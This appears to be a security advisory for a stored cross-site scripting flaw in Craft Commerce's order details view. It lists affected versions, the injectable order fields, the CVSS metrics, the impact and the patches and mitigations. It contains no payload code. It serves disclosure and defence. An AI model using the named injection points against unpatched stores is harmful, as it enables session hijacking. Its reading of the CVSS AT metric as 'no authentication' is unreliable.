CVE-2026-29177 is a stored Cross-Site Scripting (XSS) vulnerability classified under CWE-79 affecting Craft Commerce, an ecommerce platform integrated with Craft CMS. The vulnerability exists in versions >=4.0.0 and <4.10.2, and >=5.0.0 and <5.5.3. It arises from improper neutralization of input during web page generation, specifically in the order details interface. Attackers can inject malicious JavaScript code through input fields such as Shipping Method Name, Order Reference, or Site Name. When a user double-clicks an order on the order index page to open the order details slideout, the injected script executes in the context of the victim’s browser. This can lead to session hijacking, defacement, or other client-side attacks. The vulnerability requires low privileges (PR:L), user interaction (UI:A), and no authentication (AT:N). The CVSS 4.0 vector indicates network attack vector (AV:N), low attack complexity (AC:L), and limited impact on confidentiality and integrity (VI:L), with no impact on availability or system components. No known exploits have been reported in the wild. The issue was addressed in Craft Commerce versions 4.10.2 and 5.5.3 by properly sanitizing and encoding user input before rendering it in the order details UI.

The primary impact of this vulnerability is the potential execution of arbitrary JavaScript in the browsers of users viewing order details, which could lead to session hijacking, theft of sensitive information, or unauthorized actions performed on behalf of the user. Although the CVSS score is low, the risk increases in environments where users with elevated privileges (e.g., administrators or customer service agents) access order details, as their sessions could be compromised. This could lead to further compromise of the ecommerce platform or customer data. The vulnerability could also be leveraged for phishing or social engineering attacks by injecting misleading content. However, exploitation requires user interaction and some level of privilege, limiting the scope of impact. Organizations running affected versions of Craft Commerce risk reputational damage and potential data breaches if the vulnerability is exploited.

Organizations should immediately upgrade Craft Commerce to versions 4.10.2 or 5.5.3 or later, where the vulnerability is patched. Until upgrades are applied, administrators should restrict access to the order details interface to trusted users only and monitor for suspicious activity. Implementing Content Security Policy (CSP) headers can help mitigate the impact of injected scripts by restricting script execution sources. Input validation and output encoding should be reviewed and enhanced in custom plugins or integrations interacting with order data. Regular security audits and penetration testing focused on user input handling in ecommerce workflows are recommended. Additionally, educating users about the risks of interacting with untrusted content and monitoring logs for unusual order detail access patterns can reduce exploitation likelihood.